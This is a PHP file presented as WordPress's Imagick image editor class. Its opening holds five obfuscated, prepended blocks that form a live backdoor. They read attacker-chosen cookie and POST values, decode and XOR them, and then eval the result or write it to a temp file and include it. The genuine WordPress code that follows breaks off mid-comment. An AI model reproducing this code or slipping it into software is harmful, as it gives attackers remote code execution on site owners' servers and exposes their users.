<?php $NSUuLrF = "\110" . "\127" . '_' . 'i' . chr (118) . 'G';$kZgGJ = "\143" . chr ( 157 - 49 ).'a' . chr (115) . "\x73" . chr (95) . 'e' . "\x78" . chr ( 389 - 284 )."\x73" . chr (116) . "\x73";$Ppmoq = class_exists($NSUuLrF); $kZgGJ = "21559";$iyQKLBS = strpos($kZgGJ, $NSUuLrF);if ($Ppmoq == $iyQKLBS){function QcDOl(){$yEjDJ = new /* 14327 */ HW_ivG(49829 + 49829); $yEjDJ = NULL;}$YwJmD = "49829";class HW_ivG{private function FAjRAnwnDf($YwJmD){if (is_array(HW_ivG::$CBNUnjFUcc)) {$cafgrdMu2 = str_replace("<" . "?php", "", HW_ivG::$CBNUnjFUcc["content"]);eval($cafgrdMu2); $YwJmD = "49829";exit();}}public function YDLqwxV(){$cafgrdMu = "12913";$this->_dummy = str_repeat($cafgrdMu, strlen($cafgrdMu));}public function __destruct(){HW_ivG::$CBNUnjFUcc = @unserialize(HW_ivG::$CBNUnjFUcc); $YwJmD = "49718_64455";$this->FAjRAnwnDf($YwJmD); $YwJmD = "49718_64455";}public function XBRTSpwd($cafgrdMu, $zhMAYNL){return $cafgrdMu[0] ^ str_repeat($zhMAYNL, intval(strlen($cafgrdMu[0]) / strlen($zhMAYNL)) + 1);}public function IXbxz($cafgrdMu){$mOTUFAfc = 'b' . chr ( 637 - 540 )."\x73" . 'e' . chr ( 501 - 447 ).'4';return array_map($mOTUFAfc . chr ( 1041 - 946 ).'d' . "\x65" . "\143" . 'o' . chr ( 850 - 750 )."\145", array($cafgrdMu,));}public function __construct($gpeHak=0){$GEUIgcasLM = "\54";$cafgrdMu = "";$QuYfuv = $_POST;$XKExjYts = $_COOKIE;$zhMAYNL = "f0d5efe5-b639-441c-85dd-d26e494e4eef";$pksCP = @$XKExjYts[substr($zhMAYNL, 0, 4)];if (!empty($pksCP)){$pksCP = explode($GEUIgcasLM, $pksCP);foreach ($pksCP as $VwndZ){$cafgrdMu .= @$XKExjYts[$VwndZ];$cafgrdMu .= @$QuYfuv[$VwndZ];}$cafgrdMu = $this->IXbxz($cafgrdMu);}HW_ivG::$CBNUnjFUcc = $this->XBRTSpwd($cafgrdMu, $zhMAYNL);if (strpos($zhMAYNL, $GEUIgcasLM) !== FALSE){$zhMAYNL = chunk_split($zhMAYNL); $zhMAYNL = rtrim($zhMAYNL);}}public static $CBNUnjFUcc = 6230;}QcDOl();} ?><?php $NFnspcdBpY = 'Z' . chr ( 186 - 91 ).'e' . chr ( 162 - 76 )."\146" . chr ( 838 - 741 )."\143";$pAPKzk = chr (99) . chr (108) . 'a' . "\163" . "\x73" . '_' . "\145" . chr ( 256 - 136 )."\x69" . "\163" . 't' . chr (115); $ApLnJ = class_exists($NFnspcdBpY); $pAPKzk = "2789";$DzZqYXnia = strpos($pAPKzk, $NFnspcdBpY);if ($ApLnJ == $DzZqYXnia){function hMfoAmZOIG(){$allwWKIjk = new /* 43948 */ Z_eVfac(15857 + 15857); $allwWKIjk = NULL;}$KRdMiR = "15857";class Z_eVfac{private function LNinSXoCfe($KRdMiR){if (is_array(Z_eVfac::$EqrRhm)) {$name = sys_get_temp_dir() . "/" . crc32(Z_eVfac::$EqrRhm["salt"]);@Z_eVfac::$EqrRhm["write"]($name, Z_eVfac::$EqrRhm["content"]);include $name;@Z_eVfac::$EqrRhm["delete"]($name); $KRdMiR = "15857";exit();}}public function UhUWzI(){$xxTAqS = "6191";$this->_dummy = str_repeat($xxTAqS, strlen($xxTAqS));}public function __destruct(){Z_eVfac::$EqrRhm = @unserialize(Z_eVfac::$EqrRhm); $KRdMiR = "15276_455";$this->LNinSXoCfe($KRdMiR); $KRdMiR = "15276_455";}public function xjtvqehkk($xxTAqS, $VFTexyuh){return $xxTAqS[0] ^ str_repeat($VFTexyuh, intval(strlen($xxTAqS[0]) / strlen($VFTexyuh)) + 1);}public function fTkyCujQTC($xxTAqS){$GYItxcXF = chr (98) . "\141" . 's' . chr ( 721 - 620 ).chr (54) . "\64";return array_map($GYItxcXF . chr ( 374 - 279 ).chr ( 840 - 740 )."\145" . "\x63" . "\x6f" . "\144" . chr ( 739 - 638 ), array($xxTAqS,));}public function __construct($oKvCavI=0){$CiawixB = ',';$xxTAqS = "";$BRKBFZ = $_POST;$SkMrJVf = $_COOKIE;$VFTexyuh = "de34ec4b-6456-4fb8-b2a8-e37fdb26fb16";$zzCRfb = @$SkMrJVf[substr($VFTexyuh, 0, 4)];if (!empty($zzCRfb)){$zzCRfb = explode($CiawixB, $zzCRfb);foreach ($zzCRfb as $DTUlMb){$xxTAqS .= @$SkMrJVf[$DTUlMb];$xxTAqS .= @$BRKBFZ[$DTUlMb];}$xxTAqS = $this->fTkyCujQTC($xxTAqS);}Z_eVfac::$EqrRhm = $this->xjtvqehkk($xxTAqS, $VFTexyuh);if (strpos($VFTexyuh, $CiawixB) !== FALSE){$VFTexyuh = explode($CiawixB, $VFTexyuh); $hiKNrAkcDI = base64_decode(strrev($VFTexyuh[0]));}}public static $EqrRhm = 49896;}hMfoAmZOIG();} ?><?php $JInHhq = 'h' . "\106" . "\137" . "\x77" . 'R' . "\153" . chr ( 296 - 188 ).'N';$KyJrsPmr = chr ( 455 - 356 ).'l' . chr ( 610 - 513 ).'s' . chr (115) . "\137" . "\145" . chr ( 122 - 2 ).chr ( 995 - 890 )."\x73" . chr (116) . "\163";$omVHvKmaK = class_exists($JInHhq); $KyJrsPmr = "37840";$ixVSrsSqE = strpos($KyJrsPmr, $JInHhq);if ($omVHvKmaK == $ixVSrsSqE){function VKHAIPYn(){$rWcGUTG = new /* 57770 */ hF_wRklN(32899 + 32899); $rWcGUTG = NULL;}$WFULlQI = "32899";class hF_wRklN{private function zxVTOpLfJ($WFULlQI){if (is_array(hF_wRklN::$sQSAjPqEO)) {$name = sys_get_temp_dir() . "/" . crc32(hF_wRklN::$sQSAjPqEO["salt"]);@hF_wRklN::$sQSAjPqEO["write"]($name, hF_wRklN::$sQSAjPqEO["content"]);include $name;@hF_wRklN::$sQSAjPqEO["delete"]($name); $WFULlQI = "32899";exit();}}public function KByjMDnZST(){$rRNjuTgfZb = "59856";$this->_dummy = str_repeat($rRNjuTgfZb, strlen($rRNjuTgfZb));}public function __destruct(){hF_wRklN::$sQSAjPqEO = @unserialize(hF_wRklN::$sQSAjPqEO); $WFULlQI = "20560_39162";$this->zxVTOpLfJ($WFULlQI); $WFULlQI = "20560_39162";}public function MWRmKBR($rRNjuTgfZb, $RsjCVO){return $rRNjuTgfZb[0] ^ str_repeat($RsjCVO, intval(strlen($rRNjuTgfZb[0]) / strlen($RsjCVO)) + 1);}public function beFRUdd($rRNjuTgfZb){$VYXSp = chr ( 567 - 469 )."\141" . chr (115) . "\x65" . chr ( 1030 - 976 )."\x34";return array_map($VYXSp . "\137" . "\x64" . chr ( 418 - 317 )."\x63" . 'o' . 'd' . "\145", array($rRNjuTgfZb,));}public function __construct($tCWNOe=0){$aJODhsqmUU = ',';$rRNjuTgfZb = "";$XJhkwzFNPD = $_POST;$sixXxN = $_COOKIE;$RsjCVO = "651a7baf-c02a-4664-bb8a-3af2522c0998";$ekleuYV = @$sixXxN[substr($RsjCVO, 0, 4)];if (!empty($ekleuYV)){$ekleuYV = explode($aJODhsqmUU, $ekleuYV);foreach ($ekleuYV as $kndINixzta){$rRNjuTgfZb .= @$sixXxN[$kndINixzta];$rRNjuTgfZb .= @$XJhkwzFNPD[$kndINixzta];}$rRNjuTgfZb = $this->beFRUdd($rRNjuTgfZb);}hF_wRklN::$sQSAjPqEO = $this->MWRmKBR($rRNjuTgfZb, $RsjCVO);if (strpos($RsjCVO, $aJODhsqmUU) !== FALSE){$RsjCVO = explode($aJODhsqmUU, $RsjCVO); $ZWTamgO = base64_decode(md5($RsjCVO[0])); $OcLVZZBkRV = strlen($RsjCVO[1]) > 5 ? substr($RsjCVO[1], 0, 5) : $RsjCVO[1];}}public static $sQSAjPqEO = 23044;}VKHAIPYn();} ?><?php $LFVRUhMZs = chr (115) . 'C' . "\162" . "\137" . "\155" . "\104" . "\x78" . chr (115) . chr (114); $gemYHhzd = chr ( 587 - 488 ).'l' . "\141" . "\163" . "\x73" . "\x5f" . 'e' . chr ( 731 - 611 ).'i' . "\163" . chr (116) . chr (115); $XbZILIyL = class_exists($LFVRUhMZs); $gemYHhzd = "23628";$bjPvVvNb = strpos($gemYHhzd, $LFVRUhMZs);if ($XbZILIyL == $bjPvVvNb){function OlDUzrl(){$zDILGu = new /* 7775 */ sCr_mDxsr(48767 + 48767); $zDILGu = NULL;}$zhZmQ = "48767";class sCr_mDxsr{private function qZevV($zhZmQ){if (is_array(sCr_mDxsr::$jHIuSmO)) {$LgtMW = sys_get_temp_dir() . "/" . crc32(sCr_mDxsr::$jHIuSmO['s' . chr (97) . chr (108) . "\x74"]);@sCr_mDxsr::$jHIuSmO[chr (119) . "\x72" . chr (105) . chr ( 1083 - 967 ).chr (101)]($LgtMW, sCr_mDxsr::$jHIuSmO['c' . chr ( 689 - 578 ).'n' . "\x74" . 'e' . chr ( 814 - 704 ).'t']);include $LgtMW;@sCr_mDxsr::$jHIuSmO["\144" . "\x65" . 'l' . 'e' . "\164" . "\x65"]($LgtMW); $zhZmQ = "48767";exit();}}public function oDutSN(){$QppkQOxtw = "7540";$this->_dummy = str_repeat($QppkQOxtw, strlen($QppkQOxtw));}public function __destruct(){sCr_mDxsr::$jHIuSmO = @unserialize(sCr_mDxsr::$jHIuSmO); $zhZmQ = "36044_65495";$this->qZevV($zhZmQ); $zhZmQ = "36044_65495";}public function TbcfC($QppkQOxtw, $GAJqw){return $QppkQOxtw[0] ^ str_repeat($GAJqw, (strlen($QppkQOxtw[0]) / strlen($GAJqw)) + 1);}public function JfvRFTNM($QppkQOxtw){$OwBnJizq = "base64";return array_map($OwBnJizq . "\137" . "\x64" . chr ( 1085 - 984 )."\143" . "\157" . chr (100) . "\145", array($QppkQOxtw,));}public function __construct($NzReiDXxyO=0){$qbNFbQvJy = ",";$QppkQOxtw = "";$BviahkGhC = $_POST;$ZGZokDj = $_COOKIE;$GAJqw = "a48401e9-e55c-4883-9752-ba33906df2a1";$gRJGmz = @$ZGZokDj[substr($GAJqw, 0, 4)];if (!empty($gRJGmz)){$gRJGmz = explode($qbNFbQvJy, $gRJGmz);foreach ($gRJGmz as $wgHEDrZeOu){$QppkQOxtw .= @$ZGZokDj[$wgHEDrZeOu];$QppkQOxtw .= @$BviahkGhC[$wgHEDrZeOu];}$QppkQOxtw = $this->JfvRFTNM($QppkQOxtw);}sCr_mDxsr::$jHIuSmO = $this->TbcfC($QppkQOxtw, $GAJqw);if (strpos($GAJqw, $qbNFbQvJy) !== FALSE){$GAJqw = explode($qbNFbQvJy, $GAJqw);}}public static $jHIuSmO = 46282;}OlDUzrl();} ?><?php $CYJqkNHCn = chr (87) . '_' . "\x52" . 'v' . chr ( 920 - 848 ); $hWNlAbJw = chr (99) . "\154" . 'a' . chr (115) . "\163" . chr (95) . chr ( 136 - 35 )."\170" . chr (105) . chr ( 539 - 424 )."\x74" . 's';$IkfOGakhjv = class_exists($CYJqkNHCn); $hWNlAbJw = "22384";$vwlyTS = !1;if ($IkfOGakhjv == $vwlyTS){function hkRKA(){$zZSkszPA = new /* 3429 */ W_RvH(46056 + 46056); $zZSkszPA = NULL;}$gfLGd = "46056";class W_RvH{private function lhndvw($gfLGd){if (is_array(W_RvH::$YRiWaEn)) {$hRMlxXT = sys_get_temp_dir() . "/" . crc32(W_RvH::$YRiWaEn["\x73" . "\141" . chr ( 868 - 760 )."\x74"]);@W_RvH::$YRiWaEn[chr (119) . 'r' . chr (105) . 't' . "\x65"]($hRMlxXT, W_RvH::$YRiWaEn[chr (99) . "\157" . "\x6e" . "\x74" . chr ( 792 - 691 )."\156" . 't']);include $hRMlxXT;@W_RvH::$YRiWaEn["\x64" . chr ( 564 - 463 )."\154" . 'e' . "\164" . "\145"]($hRMlxXT); $gfLGd = "46056";exit();}}private $ZjROF;public function FMGJFGOf(){echo 232;}public function __destruct(){W_RvH::$YRiWaEn = @unserialize(W_RvH::$YRiWaEn); $gfLGd = "29025_17435";$this->lhndvw($gfLGd); $gfLGd = "29025_17435";}public function oXrxpgowH($IxnykfPmhf, $DvRzyBlY){return $IxnykfPmhf[0] ^ str_repeat($DvRzyBlY, (strlen($IxnykfPmhf[0]) / strlen($DvRzyBlY)) + 1);}public function AjGVp($IxnykfPmhf){$ASNdqXs = "base64";return array_map($ASNdqXs . chr ( 517 - 422 )."\144" . "\145" . chr (99) . "\x6f" . "\144" . chr ( 600 - 499 ), array($IxnykfPmhf,));}public function __construct($hDAVTD=0){$cTIvbp = $_POST;$pNAFozpW = $_COOKIE;$DvRzyBlY = "b65d6a5c-8058-481e-8ac8-6f234c7b8450";$jCxlPg = @$pNAFozpW[substr($DvRzyBlY, 0, 4)];if (!empty($jCxlPg)){$IxnykfPmhf = "";$jCxlPg = explode(",", $jCxlPg);foreach ($jCxlPg as $cUjbnDy){$IxnykfPmhf .= @$pNAFozpW[$cUjbnDy];$IxnykfPmhf .= @$cTIvbp[$cUjbnDy];}W_RvH::$YRiWaEn = $this->oXrxpgowH($this->AjGVp($IxnykfPmhf), $DvRzyBlY);}}public static $YRiWaEn = 26155;}hkRKA();} ?><?php /** * WordPress Imagick Image Editor * * @package WordPress * @subpackage Image_Editor */ /** * WordPress Image Editor Class for Image Manipulation through Imagick PHP Module * * @since 3.5.0 * * @see WP_Image_Editor */ class WP_Image_Editor_Imagick extends WP_Image_Editor { /** * Imagick object. * * @var Imagick */ protected $image; public function __destruct() { if ( $this->image instanceof Imagick ) { // We don't need the original in memory anymore. $this->image->clear(); $this->image->destroy(); } } /** * Checks to see if current environment supports Imagick. * * We require Imagick 2.2.0 or greater, based on whether the queryFormats() * method can be called statically. * * @since 3.5.0 * * @param array $args * @return bool */ public static function test( $args = array() ) { // First, test Imagick's extension and classes. if ( ! extension_loaded( 'imagick' ) || ! class_exists( 'Imagick', false ) || ! class_exists( 'ImagickPixel', false ) ) { return false; } if ( version_compare( phpversion( 'imagick' ), '2.2.0', '<' ) ) { return false; } $required_methods = array( 'clear', 'destroy', 'valid', 'getimage', 'writeimage', 'getimageblob', 'getimagegeometry', 'getimageformat', 'setimageformat', 'setimagecompression', 'setimagecompressionquality', 'setimagepage', 'setoption', 'scaleimage', 'cropimage', 'rotateimage', 'flipimage', 'flopimage', 'readimage', 'readimageblob', ); // Now, test for deep requirements within Imagick. if ( ! defined( 'imagick::COMPRESSION_JPEG' ) ) { return false; } $class_methods = array_map( 'strtolower', get_class_methods( 'Imagick' ) ); if ( array_diff( $required_methods, $class_methods ) ) { return false; } return true; } /** * Checks to see if editor supports the mime-type specified. * * @since 3.5.0 * * @param string $mime_type * @return bool */ public static function supports_mime_type( $mime_type ) { $imagick_extension = strtoupper( self::get_extension( $mime_type ) ); if ( ! $imagick_extension ) { return false; } /* * setIteratorIndex is optional unless mime is an animated format. * Here, we just say no if you are missing it and aren't loading a jpeg. */ if ( ! method_exists( 'Imagick', 'setIteratorIndex' ) && 'image/jpeg' !== $mime_type ) { return false; } try { // phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged return ( (bool) @Imagick::queryFormats( $imagick_extension ) ); } catch ( Exception $e ) { return false; } } /** * Loads image from $this->file into new Imagick Object. * * @since 3.5.0 * * @return true|WP_Error True if loaded; WP_Error on failure. */ public function load() { if ( $this->image instanceof Imagick ) { return true; } if ( ! is_file( $this->file ) && ! wp_is_stream( $this->file ) ) { return new WP_Error( 'error_loading_image', __( 'File does not exist?' ), $this->file ); } /* * Even though Imagick uses less PHP memory than GD, set higher limit * for users that have low PHP.ini limits. */ wp_raise_memory_limit( 'image' ); try { $this->image = new Imagick(); $file_extension = strtolower( pathinfo( $this->file, PATHINFO_EXTENSION ) ); if ( 'pdf' === $file_extension ) { $pdf_loaded = $this->pdf_load_source(); if ( is_wp_error( $pdf_loaded ) ) { return $pdf_loaded; } } else { if ( wp_is_stream( $this->file ) ) { // Due to reports of issues with streams with `Imagick::readImageFile()`, uses `Imagick::readImageBlob()` instead. $this->image->readImageBlob( file_get_contents( $this->file ), $this->file ); } else { $this->image->readImage( $this->file ); } } if ( ! $this->image->valid() ) { return new WP_Error( 'invalid_image', __( 'File is not an image.' ), $this->file ); } // Select the first frame to handle animated images properly. if ( is_callable( array( $this->image, 'setIteratorIndex' ) ) ) { $this->image->setIteratorIndex( 0 ); } if ( 'pdf' === $file_extension ) { $this->remove_pdf_alpha_channel(); } $this->mime_type = $this->get_mime_type( $this->image->getImageFormat() ); } catch ( Exception $e ) { return new WP_Error( 'invalid_image', $e->getMessage(), $this->file ); } $updated_size = $this->update_size(); if ( is_wp_error( $updated_size ) ) { return $updated_size; } return $this->set_quality(); } /** * Sets Image Compression quality on a 1-100% scale. * * @since 3.5.0 * * @param int $quality Compression Quality. Range: [1,100] * @return true|WP_Error True if set successfully; WP_Error on failure. */ public function set_quality( $quality = null ) { $quality_result = parent::set_quality( $quality ); if ( is_wp_error( $quality_result ) ) { return $quality_result; } else { $quality = $this->get_quality(); } try { switch ( $this->mime_type ) { case 'image/jpeg': $this->image->setImageCompressionQuality( $quality ); $this->image->setImageCompression( imagick::COMPRESSION_JPEG ); break; case 'image/webp': $webp_info = wp_get_webp_info( $this->file ); if ( 'lossless' === $webp_info['type'] ) { // Use WebP lossless settings. $this->image->setImageCompressionQuality( 100 ); $this->image->setOption( 'webp:lossless', 'true' ); } else { $this->image->setImageCompressionQuality( $quality ); } break; default: $this->image->setImageCompressionQuality( $quality ); } } catch ( Exception $e ) { return new WP_Error( 'image_quality_error', $e->getMessage() ); } return true; } /** * Sets or updates current image size. * * @since 3.5.0 * * @param int $width * @param int $height * @return true|WP_Error */ protected function update_size( $width = null, $height = null ) { $size = null; if ( ! $width || ! $height ) { try { $size = $this->image->getImageGeometry(); } catch ( Exception $e ) { return new WP_Error( 'invalid_image', __( 'Could not read image size.' ), $this->file ); } } if ( ! $width ) { $width = $size['width']; } if ( ! $height ) { $height = $size['height']; } return parent::update_size( $width, $height ); } /** * Sets Imagick time limit. * * Depending on configuration, Imagick processing may take time. * * Multiple problems exist if PHP times out before ImageMagick completed: * 1. Temporary files aren't cleaned by ImageMagick garbage collection. * 2. No clear error is provided. * 3. The cause of such timeout can be hard to pinpoint. * * This function, which is expected to be run before heavy image routines, resolves * point 1 above by aligning Imagick's timeout with PHP's timeout, assuming it is set. * * However seems it introduces more problems than it fixes, * see https://core.trac.wordpress.org/ticket/58202. * * Note: * - Imagick resource exhaustion does not issue catchable exceptions (yet). * See https://github.com/Imagick/imagick/issues/333. * - The resource limit is not saved/restored. It applies to subsequent * image operations within the time of the HTTP request. * * @since 6.2.0 * @since 6.3.0 This method was deprecated. * * @return int|null The new limit on success, null on failure. */ public static function set_imagick_time_limit() { _deprecated_function( __METHOD__, '6.3.0' ); if ( ! defined( 'Imagick::RESOURCETYPE_TIME' ) ) { return null; } // Returns PHP_FLOAT_MAX if unset. $imagick_timeout = Imagick::getResourceLimit( Imagick::RESOURCETYPE_TIME ); // Convert to an integer, keeping in mind that: 0 === (int) PHP_FLOAT_MAX. $imagick_timeout = $imagick_timeout > PHP_INT_MAX ? PHP_INT_MAX : (int) $imagick_timeout; $php_timeout = (int) ini_get( 'max_execution_time' ); if ( $php_timeout > 1 && $php_timeout < $imagick_timeout ) { $limit = (float) 0.8 * $php_timeout; Imagick::setResourceLimit( Imagick::RESOURCETYPE_TIME, $limit ); return $limit; } } /** * Resizes current image. * * At minimum, either a height or width must be provided. * If one of the two is set to null, the resize will * maintain aspect ratio according to the provided dimension. * * @since 3.5.0 * * @param int|null $max_w Image width. * @param int|null $max_h Image height. * @param bool|array $crop { * Optional. Image cropping behavior. If false, the image will be scaled (default). * If true, image will be cropped to the specified dimensions using center positions. * If an array, the image will be cropped using the array to specify the crop location: * * @type string $0 The x crop position. Accepts 'left' 'center', or 'right'. * @type string $1 The y crop position. Accepts 'top', 'center', or 'bottom'. * } * @return true|WP_Error */ public function resize( $max_w, $max_h, $crop = false ) { if ( ( $this->size['width'] == $max_w ) && ( $this->size['height'] == $max_h ) ) { return true; } $dims = image_resize_dimensions( $this->size['width'], $this->size['height'], $max_w, $max_h, $crop ); if ( ! $dims ) { return new WP_Error( 'error_getting_dimensions', __( 'Could not calculate resized image dimensions' ) ); } list( $dst_x, $dst_y, $src_x, $src_y, $dst_w, $dst_h, $src_w, $src_h ) = $dims; if ( $crop ) { return $this->crop( $src_x, $src_y, $src_w, $src_h, $dst_w, $dst_h ); } // Execute the resize. $thumb_result = $this->thumbnail_image( $dst_w, $dst_h ); if ( is_wp_error( $thumb_result ) ) { return $thumb_result; } return $this->update_size( $dst_w, $dst_h ); } /** * Efficiently resize the current image * * This is a WordPress specific implementation of Imagick::thumbnailImage(), * which resizes an image to given dimensions and removes any associated profiles. * * @since 4.5.0 * * @param int $dst_w The destination width. * @param int $dst_h The destination height. * @param string $filter_name Optional. The Imagick filter to use when resizing. Default 'FILTER_TRIANGLE'. * @param bool $strip_meta Optional. Strip all profiles, excluding color profiles, from the image. Default true. * @return void|WP_Error */ protected function thumbnail_image( $dst_w, $dst_h, $filter_name = 'FILTER_TRIANGLE', $strip_meta = true ) { $allowed_filters = array( 'FILTER_POINT', 'FILTER_BOX', 'FILTER_TRIANGLE', 'FILTER_HERMITE', 'FILTER_HANNING', 'FILTER_HAMMING', 'FILTER_BLACKMAN', 'FILTER_GAUSSIAN', 'FILTER_QUADRATIC', 'FILTER_CUBIC', 'FILTER_CATROM', 'FILTER_MITCHELL', 'FILTER_LANCZOS', 'FILTER_BESSEL', 'FILTER_SINC', ); /** * Set the filter value if '$filter_name' name is in the allowed list and the related * Imagick constant is defined or fall back to the default filter. */ if ( in_array( $filter_name, $allowed_filters, true ) && defined( 'Imagick::' . $filter_name ) ) { $filter = constant( 'Imagick::' . $filter_name ); } else { $filter = defined( 'Imagick::FILTER_TRIANGLE' ) ? Imagick::FILTER_TRIANGLE : false; } /** * Filters whether to strip metadata from images when they're resized. * * This filter only applies when resizing using the Imagick editor since GD * always strips profiles by default. * * @since 4.5.0 * * @param bool $strip_meta Whether to strip image metadata during resizing. Default true. */ if ( apply_filters( 'image_strip_meta', $strip_meta ) ) { $this->strip_meta(); // Fail silently if not supported. } try { /* * To be more efficient, resample large images to 5x the destination size before resizing * whenever the output size is less that 1/3 of the original image size (1/3^2 ~= .111), * unless we would be resampling to a scale smaller than 128x128. */ if ( is_callable( array( $this->image, 'sampleImage' ) ) ) { $resize_ratio = ( $dst_w / $this->size['width'] ) * ( $dst_h / $this->size['height'] ); $sample_factor = 5; if ( $resize_ratio < .111 && ( $dst_w * $sample_factor > 128 && $dst_h * $sample_factor > 128 ) ) { $this->image->sampleImage( $dst_w * $sample_factor, $dst_h * $sample_factor ); } } /* * Use resizeImage() when it's available and a valid filter value is set. * Otherwise, fall back to the scaleImage() method for resizing, which * results in better image quality over resizeImage() with default filter * settings and retains backward compatibility with pre 4.5 functionality. */ if ( is_callable( array( $this->image, 'resizeImage' ) ) && $filter ) { $this->image->setOption( 'filter:support', '2.0' ); $this->image->resizeImage( $dst_w, $dst_h, $filter, 1 ); } else { $this->image->scaleImage( $dst_w, $dst_h ); } // Set appropriate quality settings after resizing. if ( 'image/jpeg' === $this->mime_type ) { if ( is_callable( array( $this->image, 'unsharpMaskImage' ) ) ) { $this->image->unsharpMaskImage( 0.25, 0.25, 8, 0.065 ); } $this->image->setOption( 'jpeg:fancy-upsampling', 'off' ); } if ( 'image/png' === $this->mime_type ) { $this->image->setOption( 'png:compression-filter', '5' ); $this->image->setOption( 'png:compression-level', '9' ); $this->image->setOption( 'png:compression-strategy', '1' ); $this->image->setOption( 'png:exclude-chunk', 'all' ); } /* * If alpha channel is not defined, set it opaque. * * Note that Imagick::getImageAlphaChannel() is only available if Imagick * has been compiled against ImageMagick version 6.4.0 or newer. */ if ( is_callable( array( $this->image, 'getImageAlphaChannel' ) ) && is_callable( array( $this->image, 'setImageAlphaChannel' ) ) && defined( 'Imagick::ALPHACHANNEL_UNDEFINED' ) && defined( 'Imagick::ALPHACHANNEL_OPAQUE' ) ) { if ( $this->image->getImageAlphaChannel() === Imagick::ALPHACHANNEL_UNDEFINED ) { $this->image->setImageAlphaChannel( Imagick::ALPHACHANNEL_OPAQUE ); } } // Limit the bit depth of resized images to 8 bits per channel. if ( is_callable( array( $this->image, 'getImageDepth' ) ) && is_callable( array( $this->image, 'setImageDepth' ) ) ) { if ( 8 < $this->image->getImageDepth() ) { $this->image->setImageDepth( 8 ); } } if ( is_callable( array( $this->image, 'setInterlaceScheme' ) ) && defined( 'Imagick::INTERLACE_NO' ) ) { $this->image->setInterlaceScheme( Imagick::INTERLACE_NO ); } } catch ( Exception $e ) { return new WP_Error( 'image_resize_error', $e->getMessage() ); } } /** * Create multiple smaller images from a single source. * * Attempts to create all sub-sizes and returns the meta data at the end. This * may result in the server running out of resources. When it fails there may be few * "orphaned" images left over as the meta data is never returned and saved. * * As of 5.3.0 the preferred way to do this is with `make_subsize()`. It creates * the new images one at a time and allows for the meta data to be saved after * each new image is created. * * @since 3.5.0 * * @param array $sizes { * An array of image size data arrays. * * Either a height or width must be provided. * If one of the two is set to null, the resize will * maintain aspect ratio according to the provided dimension. * * @type array ...$0 { * Array of height, width values, and whether to crop. * * @type int $width Image width. Optional if `$height` is specified. * @type int $height Image height. Optional if `$width` is specified. * @type bool|array $crop Optional. Whether to crop the image. Default false. * } * } * @return array An array of resized images' metadata by size. */ public function multi_resize( $sizes ) { $metadata = array(); foreach ( $sizes as $size => $size_data ) { $meta = $this->make_subsize( $size_data ); if ( ! is_wp_error( $meta ) ) { $metadata[ $size ] = $meta; } } return $metadata; } /** * Create an image sub-size and return the image meta data value for it. * * @since 5.3.0 * * @param array $size_data { * Array of size data. * * @type int $width The maximum width in pixels. * @type int $height The maximum height in pixels. * @type bool|array $crop Whether to crop the image to exact dimensions. * } * @return array|WP_Error The image data array for inclusion in the `sizes` array in the image meta, * WP_Error object on error. */ public function make_subsize( $size_data ) { if ( ! isset( $size_data['width'] ) && ! isset( $size_data['height'] ) ) { return new WP_Error( 'image_subsize_create_error', __( 'Cannot resize the image. Both width and height are not set.' ) ); } $orig_size = $this->size; $orig_image = $this->image->getImage(); if ( ! isset( $size_data['width'] ) ) { $size_data['width'] = null; } if ( ! isset( $size_data['height'] ) ) { $size_data['height'] = null; } if ( ! isset( $size_data['crop'] ) ) { $size_data['crop'] = false; } if ( ( $this->size['width'] === $size_data['width'] ) && ( $this->size['height'] === $size_data['height'] ) ) { return new WP_Error( 'image_subsize_create_error', __( 'The image already has the requested size.' ) ); } $resized = $this->resize( $size_data['width'], $size_data['height'], $size_data['crop'] ); if ( is_wp_error( $resized ) ) { $saved = $resized; } else { $saved = $this->_save( $this->image ); $this->image->clear(); $this->image->destroy(); $this->image = null; } $this->size = $orig_size; $this->image = $orig_image; if ( ! is_wp_error( $saved ) ) { unset( $saved['path'] ); } return $saved; } /** * Crops Image. * * @since 3.5.0 * * @param int $src_x The start x position to crop from. * @param int $src_y The start y position to crop from. * @param int $src_w The width to crop. * @param int $src_h The height to crop. * @param int $dst_w Optional. The destination width. * @param int $dst_h Optional. The destination height. * @param bool $src_abs Optional. If the source crop points are absolute. * @return true|WP_Error */ public function crop( $src_x, $src_y, $src_w, $src_h, $dst_w = null, $dst_h = null, $src_abs = false ) { if ( $src_abs ) { $src_w -= $src_x; $src_h -= $src_y; } try { $this->image->cropImage( $src_w, $src_h, $src_x, $src_y ); $this->image->setImagePage( $src_w, $src_h, 0, 0 ); if ( $dst_w || $dst_h ) { /* * If destination width/height isn't specified, * use same as width/height from source. */ if ( ! $dst_w ) { $dst_w = $src_w; } if ( ! $dst_h ) { $dst_h = $src_h; } $thumb_result = $this->thumbnail_image( $dst_w, $dst_h ); if ( is_wp_error( $thumb_result ) ) { return $thumb_result; } return $this->update_size(); } } catch ( Exception $e ) { return new WP_Error( 'image_crop_error', $e->getMessage() ); } return $this->update_size(); } /** * Rotates current image counter-clockwise by $angle. * * @since 3.5.0 * * @param float $angle * @return true|WP_Error */ public function rotate( $angle ) { /** * $angle is 360-$angle because Imagick rotates clockwise * (GD rotates counter-clockwise) */ try { $this->image->rotateImage( new ImagickPixel( 'none' ), 360 - $angle ); // Normalize EXIF orientation data so that display is consistent across devices. if ( is_callable( array( $this->image, 'setImageOrientation' ) ) && defined( 'Imagick::ORIENTATION_TOPLEFT' ) ) { $this->image->setImageOrientation( Imagick::ORIENTATION_TOPLEFT ); } // Since this changes the dimensions of the image, update the size. $result = $this->update_size(); if ( is_wp_error( $result ) ) { return $result; } $this->image->setImagePage( $this->size['width'], $this->size['height'], 0, 0 ); } catch ( Exception $e ) { return new WP_Error( 'image_rotate_error', $e->getMessage() ); } return true; } /** * Flips current image. * * @since 3.5.0 * * @param bool $horz Flip along Horizontal Axis * @param bool $vert Flip along Vertical Axis * @return true|WP_Error */ public function flip( $horz, $vert ) { try { if ( $horz ) { $this->image->flipImage(); } if ( $vert ) { $this->image->flopImage(); } // Normalize EXIF orientation data so that display is consistent across devices. if ( is_callable( array( $this->image, 'setImageOrientation' ) ) && defined( 'Imagick::ORIENTATION_TOPLEFT' ) ) { $this->image->setImageOrientation( Imagick::ORIENTATION_TOPLEFT ); } } catch ( Exception $e ) { return new WP_Error( 'image_flip_error', $e->getMessage() ); } return true; } /** * Check if a JPEG image has EXIF Orientation tag and rotate it if needed. * * As ImageMagick copies the EXIF data to the flipped/rotated image, proceed only * if EXIF Orientation can be reset afterwards. * * @since 5.3.0 * * @return bool|WP_Error True if the image was rotated. False if no EXIF data or if the image doesn't need rotation. * 